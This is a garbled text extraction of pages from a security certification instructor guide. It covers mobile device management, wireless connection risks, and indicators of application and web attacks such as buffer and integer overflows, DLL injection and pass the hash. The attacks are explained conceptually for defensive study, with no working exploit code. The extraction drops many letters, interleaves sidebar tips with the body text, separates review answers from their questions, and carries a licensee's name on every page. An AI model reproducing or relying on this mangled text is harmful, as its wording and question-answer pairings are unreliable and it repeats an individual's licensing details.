340 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Embedded System Security Implications
Answer the following uestions
ower many embedded systems must operate on battery power, and changing
the batteries is an onerous task, so power hungry systems like processing and high
bandwidth or long range networking are constrained.
alse these are e amples of one board computers based on the system on chip oC
design. They are widely used in education and leisure . ome are used for industrial
applications or for proof of concept designs, but most embedded systems are
manufactured to specific re uirements.
A LT based cellular radio, such as narrowband IoT, uses a subscriber identity module
IM card as an identifier. This can either be installed as a plug in card or configured as
an e IM chip on the system board or feature in a oC design.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 341
Lesson 12
Summary
ou should be able to apply host hardening policies and technologies and to assess Teaching
risks from third party supply chains and embedded IoT systems. Tip
Check that students
uidelines or Implementin ost ecurit olutions are confident about
the content that has
been covered. If there
ollow these guidelines when you deploy or re assess endpoint security and integration
is time, re visit any
with embedded or IoT systems content e amples that
• Assess third party risks and ensure that appropriate procedures and agreements they have uestions
about. If you have
M , NDA, LA, A, M A are used to onboard approved vendors and partners as used all the available
technology and solutions providers. time for this lesson
block, note the issues,
• stablish configuration baselines for each host type. nsure that hosts are deployed and schedule time for
to the configuration baseline and set up monitoring to ensure compliance. a review later in the
course.
• Configure secure boot options and consider the use of attestation and policy
servers as the basis of a network access control mechanism. Interaction
Opportunity
• Configure storage encryption using full disk or self encrypting drives. ptionally, ask
students if they have
• Deploy an endpoint protection solution that meets security re uirements for e perience either of
functions such as anti malware, firewall, ID , D , and DL . IC CADA system
or AC . Ask if IoT
• stablish patch management procedures to test updates for di erent host groups devices are present in
and ensure management of both and third party software. their workplace, and
whether there is a
• Create a management plan for any IoT devices used in the workplace and ensure management plan for
there is no shadow IT deployment of unmanaged appliances. them.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 13
Implementing Secure Mobile Solutions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
344 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 13A
Implement Mobile Device Management
• Choose your own device (CYOD)—much the same as COPE but the employee is
given a choice of device from a list.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 345
In Apple's iOS ecosystem, third-party developers can create apps using Apple's i in the nterprise
oftware Development it, available only on Mac . Apps have to be submitted to
and approved by Apple before they are released to users via the App Store. Corporate Teaching
control over i devices and distribution of corporate and usiness to usiness Tip
apps is facilitated by participating in the Device nrollment rogram support.apple. Remind students of
com/business , the olume urchase rogram, and the Developer nterprise rogram the importance of
developer.apple.com/programs/enterprise). Another option is to use an EMM suite keeping developer
and its development tools to create a "wrapper" for the corporate app. accounts secure.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
346 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Most iOS attacks are the same as with any system; users click malicious links or enter
information into phishing sites, for instance. As a closed and proprietary system, it
should not be possible for malware to infect an iOS device as all code is updated from
Apple's servers only. There remains the risk that a vulnerability in either iOS or an app
could be discovered and exploited. In this event, users would need to update iOS or the
app to a version that mitigates the exploit.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 347
iOS devices are normally updated very quickly. With Android, the situation is less
consistent, as updates often depend on the handset vendor to complete the new
version or issue the patch for their avor of Android. Android is more open and
there is Android malware, though as with Apple it is difficult for would be hackers and
spammers to get it into any of the major app repositories.
One techni ue used is called Staged Payloads. The malware writers release an app that
appears innocuous in the store but once installed it attempts to download additional
components infected with malware (zdnet.com article android-security-sneaky-three-stage-
malware-found-in-google-play-store). Google has implemented a server-side malware
scanning product (Play Protect) that will both warn users if an app is potentially damaging
and scan apps that have already been purchased, and warn the user if any security issues
have been discovered.
Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid
source.android.com/security/selinux uses mandatory access control MAC policies to
run apps in sandbo es. hen the app is installed, access is granted or not to specific
shared features, such as contact details, M te ting, and email.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
348 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring authentication and profile policies using Intune E ote that the policy allows the user
to have a different type of authentication (or none at all) to the workspace hosting corporate apps
and data. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 349
Strong passwords should always be set on mobile devices, as simple -digit PI codes can
easily be brute-forced. Swipe patterns are vulnerable to poor user choices (arstechnica.
com information-technology 01 0 new-data-uncovers-the-surprising-predictability-of-
android-lock-patterns), such as choosing letter or box patterns, plus the tendency for the
grease trail to facilitate a smudge attack.
Screen Lock
The screen lock can also be configured with a lockout policy. This means that if an
incorrect passcode is entered, the device locks for a set period. This could be configured
to escalate so the first incorrect attempt locks the device for seconds while the third
locks it for 10 minutes, for instance). This deters attempts to guess the passcode.
Context-Aware Authentication
It is also important to consider newer authentication models, such as context-aware
authentication. For example, smartphones now allow users to disable screen locks
when the device detects that it is in a trusted location, such as the home. Conversely,
an enterprise may seek more stringent access controls to prevent misuse of a device.
For example, even if the device has been unlocked, accessing a corporate workspace
might require the user to authenticate again. It might also check whether the network
connection can be trusted that it is not an open i I hotspot, for instance .
A remote wipe or kill switch means that if the handset is stolen it can be set to the Remote Wipe
factory defaults or cleared of any personal data saniti ation . ome utilities may also
be able to wipe any plug-in memory cards too. The remote wipe could be triggered by
several incorrect passcode attempts or by enterprise management software. Other
features include backing up data from the phone to a server first and displaying a
Lost stolen phone return to message on the handset.
ost corporate messaging systems come with a remote wipe feature (such as this one provided with
Intermedia mail hosting), allowing mail, calendar, and contacts information to be deleted from mobile
devices. (Screenshot used with permission from Intermedia.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
350 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to
the network, then hacking the phone and disabling the security.
Location services is available to any app where the user has granted the app
permission to use it.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 351
Using ind y evice to locate an Android smartphone. (Android is a trademark of Google C.)
The primary concern surrounding location services is one of privacy. Although very
useful for maps and turn-by-turn navigation, it provides a mechanism to track an
individual's movements, and therefore their social and business habits. The problem
is further compounded by the plethora of mobile apps that require access to location
services and then both send the information to the application developers and store
it within the device's file structure. If an attacker can gain access to this data, then
stalking, social engineering, and even identity theft become real possibilities.
Restricting device permissions such as camera and screen capture using Intune.
(Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
352 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
GPS Tagging
tagging is the process of adding geographical identification metadata, such as
the latitude and longitude where the device was located at the time, to media such as
photographs, SMS messages, video, and so on. It allows the app to place the media
at specific latitude and longitude coordinates. tagging is highly sensitive personal
information and potentially confidential organi ational data also. tagged pictures
uploaded to social media could be used to track a person's movements and location.
For example, a Russian soldier revealed troop positions by uploading GPS tagged
selfies to Instagram arstechnica.com/tech-policy/2014/08/opposite-of-opsec-russian-
soldier posts selfies from inside ukraine .
Endpoint management software such as icrosoft Intune can be used to approve or prohibit apps.
(Screenshot used with permission from icrosoft.)
A trusted app source is one that is managed by a service provider. The service provider
authenticates and authori es valid developers, issuing them with a certificate to use
to sign their apps and warrant them as trusted. It may also analyze code submitted to
ensure that it does not pose a security or privacy risk to its customers or remove apps
that are discovered to pose such a risk). It may apply other policies that developers
must meet, such as not allowing apps with adult content or apps that duplicate the
function of core OS apps.
The mobile defaults to restricting app installations to the linked store App tore for
iOS and Play for Android). Most consumers are happy with this model but it does not
work so well for enterprises. It might not be appropriate to deliver a custom corporate
app via a public store, where anyone could download it. Apple operates enterprise
developer and distribution programs to solve this problem, allowing private app
distribution via Apple usiness Manager developer.apple.com/business/distribute).
Google's Play store has a private channel option, called Managed Google Play. Both
these options allow an EMM/UEM suite to push apps from the private channel to
the device.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 353
nlike i , Android allows for selection of di erent stores and installation of untrusted
apps from any third party, if this option is enabled by the user. With unknown sources
enabled, untrusted apps can be downloaded from a website and installed using the
.apk file format. This is referred to as sideloading.
Conversely, a management suite might be used to prevent the use of third-party stores
or sideloading and block unapproved app sources.
Containerization allows the employer to manage and maintain the portion of the Content Management
device that interfaces with the corporate network. An enterprise workspace with a
defined selection of apps and a separate container is created. This container isolates Teaching
corporate apps from the rest of the device. There may be a requirement for additional Tip
authentication to access the workspace. Note that the
security of these
The container can also enforce storage segmentation. With storage segmentation the
containerization
container is associated with a directory on the persistent storage device that is not mechanisms depends
readable or writable by apps that are not in the container. Conversely, apps cannot upon the device not
write to areas outside the container, such as external media or using copy and paste being rooted.
to a non container app. App network access might be restricted to a N tunneled
through the organization's security system.
The enterprise is thereby able to maintain the security it needs, without having to
enforce policies that a ect personal use, apps, or data.
Containeri ation also assists content management and data loss prevention DL
systems. A content management system tags corporate or confidential data and
prevents it from being shared or copied to unauthorized external media or channels,
such as non corporate email systems or cloud storage services.
Like Windows and Linux, the account used to install the OS and run kernel-level Rooting and
processes is not the one used by the device owner. Users who want to avoid the Jailbreaking
restrictions that some vendors, handset Ms, and telecom providers carriers put
on the devices must use some type of privilege escalation: Teaching
Tip
• Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device. For Detecting whether
a device has been
some devices it is necessary to e ploit a vulnerability or use custom firmware. rooted is not
Custom firmware is essentially a new Android image applied to the device. This straightforward.
can also be referred to as a custom ROM, after the term for the read only memory You might want to
chips that used to hold firmware. point students to
Google's attestation
• Jailbreaking—iOS is more restrictive than Android so the term "jailbreaking" API documentation
became popular for exploits that enabled the user to obtain root privileges, for more information
on root detection
sideload apps, change or add carriers, and customize the interface. iOS jailbreaking
developer.android.
is accomplished by booting the device with a patched kernel. For most exploits, com/training/
this can only be done when the device is attached to a computer when it boots safetynet/attestation).
tethered ailbreak .
• Carrier unlocking—for either iOS or Android, this means removing the restrictions
that lock a device to a single carrier.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
354 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
If the user has applied a custom firmware image, they could have removed the
protections that enforce segmentation. The device can no longer be assumed to run a
trusted OS.
MM M has routines to detect a rooted or ailbroken device or custom firmware with
no valid developer code signature and prevent access to an enterprise app, network,
or workspace. Containerization and enterprise workspaces can use cryptography to
protect the workspace in a way that is much harder to compromise than a local agent,
even from a rooted ailbroken device.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 355
Review Activity:
Mobile Device Management
Answer the following questions:
1. What type of deployment model(s) allow users to select the mobile device
make and model?
3. Company policy requires that you ensure your smartphone is secured from
unauthorized access in case it is lost or stolen. To prevent someone from
accessing data on the device immediately after it has been turned on, what
security control should be used?
Screen lock.
4. An employee's car was recently broken into, and the thief stole a company
tablet that held a great deal of sensitive data. You've already taken the
precaution of securing plenty of backups of that data. What should you do
to be absolutely certain that the data doesn't fall into the wrong hands?
5. What is containerization?
The user installs an app directly onto the device rather than from an official app store.
7. Why might a company invest in device control software that prevents the
use of recording devices within company premises?
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
356 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 13B
Implement Secure Mobile
e ice onnections
ocking down Android connectivity methods with Intune note that most settings can be applied only
to Samsung O -capable devices. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 357
individuals can do about these weaknesses. The attacks require a high degree of
sophistication and are relatively uncommon.
Mobile devices usually default to using a Wi-Fi connection for data, if present. If the Wi-Fi and Tethering
user establishes a connection to a corporate network using strong WPA3 security, Connection Methods
there is a fairly low risk of eavesdropping or man-in-the-middle attacks. The risks from
Wi-Fi come from users connecting to open access points or possibly a rogue access
point imitating a corporate network. These allow the access point owner to launch any
number of attacks, even potentially compromising sessions with secure servers using
a DN spoofing attack, for instance .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
358 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Pairing a computer with a smartphone. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 359
It is also the case that using a control center toggle may not actually turn off the luetooth
radio on a mobile device. If there is any doubt about patch status or exposure to
vulnerabilities, luetooth should be fully disabled through device settings.
Infrared signaling has been used for AN in the past IrDA , but the use of infrared in Infrared and ID
modern smartphones and wearable technology focuses on two other uses: Connection Methods
• IR blaster—this allows the device to interact with an IR receiver and operate a device
such as a TV or HVAC monitor as though it were the remote control handset.
• I sensor these are used as pro imity sensors to detect when a smartphone is
being held to the ear, for instance and to measure health information such as
heart rate and blood o ygen levels .
Teaching
ear ield Communications and o ile a ment er ices Tip
Sophos Security has
NFC is based on a particular type of radio fre uency ID ID . N C sensors and
produced a video
functionality are now commonly incorporated into smartphones. An N C chip can about N C card
also be used to read passive ID tags at close range. It can also be used to configure skimming facebook.
other types of connections pairing luetooth devices for instance and for e changing com/SophosSecurity/
information, such as contact cards. An N C transaction is sometimes known as a bump, videos/
named after an early mobile sharing app, later redeveloped as Android Beam, to use 10155345347100017).
They also evaluate
N C. The typical use case is in smart posters, where the user can tap the tag in the card and wallet
poster to open a linked web page via the information coded in the tag. Attacks could protectors designed
be developed using vulnerabilities in handling the tag securityboulevard.com/2019/10/ to block N C
nfc-false-tag-vulnerability-cve-2019-9295). It is also possible that there may be some transmissions.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
360 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
way to e ploit N C by crafting tags to direct the device browser to a malicious web
page where the attacker could try to exploit any vulnerabilities in the browser.
N C does not provide encryption, so eavesdropping and man in the middle attacks are
possible if the attacker can find some way of intercepting the communication and the
software services are not encrypting the data.
The widest application of N C is to make payments via contactless point of sale o
machines. To configure a payment service, the user enters their credit card information
into a mobile wallet app on the device. The wallet app does not transmit the original
credit card information, but a one-time token that is interpreted by the card merchant
and linked backed to the relevant customer account. There are three major mobile
wallet apps Apple ay, oogle ay formerly Android ay , and amsung ay.
Despite having a close physical pro imity re uirement, N C is vulnerable to several
types of attacks. Certain antenna configurations may be able to pick up the signals
emitted by N C from several feet away, giving an attacker the ability to eavesdrop
from a more comfortable distance. An attacker with a reader may also be able to skim
information from an N C device in a crowded area, such as a busy train. An attacker
may also be able to corrupt data as it is being transferred through a method similar
to a Do attack by ooding the area with an e cess of signals to interrupt the
transfer.
Skimming a credit or bank card will give the attacker the long card number and expiry date.
Completing fraudulent transactions directly via C is much more difficult as the attacker
would have to use a valid merchant account and fraudulent transactions related to that
account would be detected very uickly.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 361
group messaging/calling, and read receipts. RCS is supported by carriers via Universal
rofile for Advanced Messaging gsma.com futurenetworks digest universal profile
version-2-0-advanced-rcs-messaging). The main drawbacks of RCS are that carrier
support is patchy messages fallback to M if C is not supported and there is no
end to end encryption, at the time of writing theverge.com/2020/5/27/21271186/
google rcs t mobile encryption ccmi universal profile).
ulnerabilities in processing attachments and rich formatting have resulted in Do
attacks against certain handsets in the past, so it is important to keep devices patched
against known threats.
ush notifications are store services such as Apple ush Notification ervice and
oogle Cloud to Device Messaging that an app or website can use to display an alert
on a mobile device. sers can choose to disable notifications for an app, but otherwise
the app developer can target notifications to some or all users with that app installed.
Developers need to take care to properly secure the account and services used to
send push notifications. There have been e amples in the past of these accounts being
hacked and used to send fake communications.
A baseband update modifies the firmware of the radio modem used for cellular, i i, Firmware Over-the-Air
luetooth, N C, and connectivity. The radio firmware in a mobile device contains Updates
an operating system that is separate from the end user operating system for e ample,
Android or iOS). The modem uses its own baseband processor and memory, which
boots a real time operating system T . An T is often used for time sensitive
embedded controllers, of the sort required for the modulation and frequency shifts
that underpin radio-based connectivity.
The procedures for establishing radio connections are complex and require strict
compliance with regulatory certification schemes, so incorporating these functions in
the main OS would make it far harder to bring OS updates to market. Unfortunately,
baseband operating systems have been associated with several vulnerabilities over the
years, so it is imperative to ensure that updates are applied promptly. These updates
are usually pushed to the handset by the device vendor, often as part of OS upgrades.
The updates can be delivered wirelessly, either through a Wi-Fi network or the data
connection, referred to as over-the-air (OTA). A handset that has been jailbroken
or rooted might be able to be configured to prevent baseband updates or apply a
particular version manually, but in the general course of things, there is little reason to
do so.
There are various ways of exploiting vulnerabilities in the way these updates work. A
well-resourced attacker can create an "evil base station" using a Stingray/International
Mobile ubscriber Identity IM I catcher. This will allow the attacker to identify the
location of cell devices operating in the area. In some circumstances it might be
possible to launch a man in the middle attack and abuse the firmware update process
to compromise the phone.
Cellular networks are microwave radio networks provisioned for multiple subscribers. Microwave Radio
Microwave radio is also used as a backhaul link from a cell tower to the service Connection Methods
provider's network. These links are important to 5G, where many relays are required
and provisioning fiber optic cabled backhaul can be difficult. rivate microwave links
are also used between sites. A microwave link can be provisioned in two modes:
• Point-to-point (P2P) microwave uses high gain antennas to link two sites. High
gain means that the antenna is highly directional. Each antenna is pointed directly
at the other. In terms of security, this makes it difficult to eavesdrop on the signal,
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
362 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
as an intercepting antenna would have to be positioned within the direct path. The
satellite modems or routers are also normally paired to one another and can use
over-the-air encryption to further mitigate against snooping attacks.
Multipoint can be used in other contexts. For example, Bluetooth supports a multipoint
mode. This can be used to connect a headset to multiple sources a C and a
smartphone, for instance) simultaneously.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 363
Review Activity:
Secure o ile e ice onnections
Answer the following questions:
An attacker might set up some sort of rogue access point i i or cell tower cellular
to perform eavesdropping or man in the middle attacks. or ersonal Area Network
AN range communications, there might be an opportunity for an attacker to run
exploit code over the channel.
This would allow a PC or laptop to connect to the Internet via the smartphone's cellular
data connection. This could be used to evade network security mechanisms, such as
data loss prevention or content filtering.
True in theory though the vector is known to the mobile and handset vendors so
the exploit is unlikely to be able to run without user authorization.
luesnarfing.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
364 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 13
Summary
Teaching You should be able to use endpoint management solutions to apply device and
Tip application enforcement and monitoring and understand risks from mobile connection
Check that students methods and other technologies.
are confident about
the content that has
been covered. If there Guidelines for Implementing Secure Mobile Solutions
is time, re-visit any
content examples that Follow these guidelines when you deploy or reassess mobile device and application
they have questions management:
about. If you have
used all the available
• elect a mobile deployment model that best fits organi ation security re uirements
time for this lesson and employee business needs D, C ,C ,C D.
block, note the issues,
and schedule time for • Deploy a mobile universal endpoint management platform to set device and
a review later in the application policies:
course.
• Allowed connection methods cellular, i i, tethering, and luetooth .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 14
Summarizing Secure
Application oncepts
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
366 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14A
Analyze Indicators
o Application Attacks
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 367
Error Handling
An application attack may cause an error message. In Windows, this may be of the
following types Instruction could not be read or written, ndefined e ception,
or "Process has encountered a problem." One issue for error handling is that the
application should not reveal configuration or platform details that could help an
attacker. For example, an unhandled exception on a web application might show an
error page that reveals the type and configuration of a database server.
In an over ow attack, the threat actor submits input that is too large to be stored in
ver ow
a variable assigned by the application. ome of the general over ow vulnerabilities
Vulnerabilities
are discussed here. To keep up to date with specific attack methods and new types of
attack, monitor a site such as OWASP (owasp.org/www-community/attacks). Ideally, the Teaching
code used to attempt these attacks will be identified by network ID or by an endpoint Tip
protection agent. Unsuccessful attempts may be revealed through unexplained crashes To protect against
or error messages following a file download, e ecution of a new app or a script, or software exploitation,
connection of new hardware. apply security
patches (for third-
u er er o party applications) or
secure programming
A bu er is an area of memory that the application reserves to store e pected data. To practice (for your own
exploit a u er o er o vulnerability, the attacker passes data that deliberately overfills applications).
the bu er. ne of the most common vulnerabilities is a stack over ow. The stack is an OWASP is a great
area of memory used by a program subroutine. It includes a return address, which is the resource for more
location of the program that called the subroutine. An attacker could use a bu er over ow detailed information.
to change the return address, allowing the attacker to run arbitrary code on the system. As EternalBlue
shows, an exploit
might use several
attack techniques
to compromise
vulnerable code.
hen executed normally, a function will return control to the calling function. If the code
is vulnerable, an attacker can pass malicious data to the function, over ow the stack,
and run arbitrary code to gain a shell on the target system.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
368 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Inte er er o
An integer is a positive or negative number with no fractional component (a whole
number . Integers are widely used as a data type, where they are commonly defined
with fi ed lower and upper bounds. An inte er o er o attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive
number to become negative (changing a bank debit to a credit, for instance). It could
also be used where the software is calculating a bu er si e if the attacker is able to
make the bu er smaller than it should be, he or she may then be able to launch a
bu er over ow attack.
Eternal lue is an example of an exploit that uses vulnerabilities in integer over ow to effect
a buffer over ow and gain system privileges on a indows host (sentinelone.com/blog/
eternalblue-nsa-developed-exploit-just-wont-die).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 369
malicious process could spawn multiple looping threads to use up CPU time, or write
thousands of files to disk. Distributed attacks against network applications perform a
type of resource exhaustion attack by starting but not completing sessions, causing
the application to fill up its state table, leaving no opportunities for genuine clients
to connect.
A dynamic link library (DLL) is a binary package that implements some sort of standard DLL In ection and
functionality, such as establishing a network connection or performing cryptography. Driver Manipulation
The main process of a software application is likely to load several DLLs during the
normal course of operations. Teaching
Tip
DLL injection is a vulnerability in the way the operating system allows one process to
attach to another. This functionality can be abused by malware to force a legitimate Stress to students
that like any file,
process to load a malicious link library. The link library will contain whatever functions DLLs and drivers
the malware author wants to be able to run. Malware uses this technique to move from should only be run or
one host process to another to avoid detection. A process that has been compromised installed if they are
by DLL in ection might open une pected network connections, or interact with files and signed with a valid
the registry suspiciously. certificate from a
reputable vendor.
To perform DLL in ection the malware must already be operating with sufficient
privileges, typically local administrator or system privileges. It must also evade
detection by antivirus software. One means of doing this is code refactoring.
Refactoring means that the code performs the same function by using di erent
methods (control blocks, variable types, and so on). Refactoring means that the A-V
software may no longer identify the malware by its signature.
function calls to allow DLL in ection are legitimately used for operations such
as debugging and monitoring. Another opportunity for malware authors to exploit
these calls is the Windows Application Compatibility framework. This allows legacy
applications written for an OS, such as Windows XP, to run on later versions. The code
library that intercepts and redirects calls to enable legacy mode functionality is called a
shim. The shim must be added to the registry and its files packed in a shim database
. D file added to the system folder. The shim database represents a way that
malware with local administrator privileges can run on reboot (persistence). Show Slide(s)
A threat actor has to be either relatively lucky to find an unpatched vulnerability, or Teaching
well-resourced enough to develop a zero-day exploit. Once an initial foothold has been Tip
gained, the threat actor may try to find simpler ways to move around the network. You might also want to
mention golden ticket
Attackers can extend their lateral movement by a great deal if they are able to attacks (youtube.com/
compromise host credentials. One common credential exploit technique for lateral watch?v=
movement is called pass the hash (PtH). This is the process of harvesting an account's lJQn06QLwEw).
cached credentials when the user is logged into a single sign-on (SSO) system so the If students are
attacker can use the credentials on other systems. If the threat actor can obtain the interested in learning
hash of a user password, it is possible to present the hash (without cracking it) to more about Pass
the Hash and ticket
authenticate to network protocols such as the Windows File Sharing protocol Server
forging, refer them
Message Block (SMB), and other protocols that accept NTLM hashes as authentication to the briefing here
credentials. or e ample, most indows domain networks are configured to allow media.blackhat.com/
NTLM as a legacy authentication method for services. The attacker's access isn't ust bh us riefings
limited to a single host, as they can pass the hash onto any computer in the network Duckwall/BH_US_12_
that is tied to the domain. This drastically cuts down on the e ort the threat actor must Duckwall_Campbell_
Still_Passing_WP.pdf
spend in moving from host to host.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
370 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
ass the hash is relatively difficult to detect, as it e ploits legitimate network behavior.
A detection system can be configured to correlate a se uence of security log events
using NTLM-type authentication, but this method can be prone to false positives
(blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 371
Review Activity:
Indicators o Application Attacks
Answer the following questions:
The Notepad process has been compromised, possibly using bu er over ow or a DLL
process in ection attack. The threat actor has then performed lateral movement and
privilege escalation, gaining higher privileges through remote code execution on the
application server.
The integer value could be used to allocate less memory than a process expects,
making a bu er over ow easier to achieve.
A process claims memory locations but never releases them, reducing the amount of
memory available to other processes. This will damage performance, could prevent
other processes from starting, and if left unchecked could crash the OS.
Various OS system functions allow one process to manipulate another and force it to
load a dynamic link library (DLL). This means that the malware code can be migrated
from one process to another, evading detection.
These attacks are revealed by use of certain modes of NTLM authentication within the
security (audit) log of the source and target hosts. These indicators can be prone to
false positives, however, as many services use NTLM authentication legitimately.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
372 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 14B
Analyze Indicators of Web
Application Attacks
HTTP Methods
As part of URL analysis, it is important to understand how HTTP operates. An HTTP
session starts with a client (a user-agent, such as a web browser) making a request to
an HTTP server. The connection establishes a TCP connection. This TCP connection can
be used for multiple re uests, or a client can start new TC connections for di erent
requests. A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body. The principal method is GET, used to retrieve a
resource. Other methods include:
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 373
Percent Encoding
A URL can contain only unreserved and reserved characters from the ASCII set.
Reserved ASCII characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control characters,
such as null string termination, carriage return, line feed, end of file, and tab, are
unsafe. Percent encoding allows a user-agent to submit any safe or unsafe character
(or binary data) to the server within the URL. Its legitimate uses are to encode reserved
characters within the URL when they are not part of the URL syntax and to submit
Unicode characters. Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input. Percent encoding can
exploit weaknesses in the way the server application performs decoding. Consequently,
URLs that make unexpected or extensive use of percent encoding should be treated
carefully. You can use a resource such as W3 Schools (w3schools.com/tags/ref_
urlencode.asp) for a complete list of character codes, but it is helpful to know some of
the characters most widely used in exploits.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
374 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching https://webapp.foo/?
Tip Action=RunInstance&Id=123&Count=1&Instance
Make sure students
AccessKey=MyInstanceAccessKey&Placement=us-
can identify the east&MyAuthorizationToken
general format of an
API call. If the API isn't secure, threat actors can easily take advantage of it to compromise the
services and data stored on the web application. An API must only be used over an
encrypted channel (HTTPS). API calls over plain HTTP are not secure and could easily be
impersonated or modified by a third party. ome other common attacks against A Is
target the following weaknesses and vulnerabilities:
• Ine ective secrets management, allowing threat actors to discover an A I key and
perform any action authorized to that key.
• Lack of input validation, allowing the threat actor to insert arbitrary parameters into
API methods and queries. This is often referred to as allowing unsanitized input.
• Denial of service (DoS) by bombarding the API with spurious calls. Protection against
this attack can be provided through throttling/rate-limiting mechanisms.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 375
iewing cookies set by Google s home page using the irefox browser s Inspector tools. These cookies
are not used for authentication, but they do track whether the user has visited the site before. The
CO SE T cookie tracks whether the user has agreed to the terms and conditions of use.
In the context of a web application, session hijacking most often means replaying a ession i acking and
cookie in some way. Attackers can sni network traffic to obtain session cookies sent Cross-Site Request
over an unsecured network, like a public i i hotspot. To counter cookie hi acking, Forgery (2)
you can encrypt cookies during transmission, delete cookies from the client's browser
cache when the client terminates the session, and design your web app to deliver a Teaching
new cookie with each new session between the app and the client's browser. Tip
Session prediction attacks focus on identifying possible weaknesses in the generation Note that a client-
side attack is where
